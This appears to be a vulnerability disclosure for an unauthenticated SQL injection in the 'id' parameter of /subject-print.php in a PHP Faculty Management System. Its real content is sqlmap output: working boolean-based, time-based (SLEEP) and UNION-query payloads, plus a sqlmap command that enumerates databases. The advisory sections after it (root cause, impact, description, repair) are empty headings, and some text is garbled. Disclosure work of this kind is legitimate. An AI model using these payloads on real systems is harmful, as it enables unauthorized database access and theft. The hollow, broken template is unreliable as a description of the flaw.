---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=4' AND 5584=5584 AND 'qMna'='qMna
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=4' AND (SELECT 3126 FROM (SELECT(SLEEP(5)))WHqZ) AND 'DusQ'='DusQ
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: id=4' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b707171,0x48767471724f4846446d764578424c6f6b54427953724b45734743754f6a6a456f5a675543627072,0x716a706b71),NULL-- -
---
python sqlmap.py -r 1.txt --batch --dbs
code-projects Faculty Management System Project V1.0 /subject-print.php SQL injection
NAME OF AFFECTED PRODUCT(S)
Faculty Management System
Vendor Homepage
AFFECTED AND/OR FIXED VERSION(S)
submitter
Vulnerable File
VERSION(S)
Software Link
PROBLEM TYPE
Vulnerability Type
Root Cause
Impact
DESCRIPTION
No login or authorization is required to exploit this vulnerability
Vulnerability details and POC
Vulnerability lonameion:
Payload:
The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
Suggested repair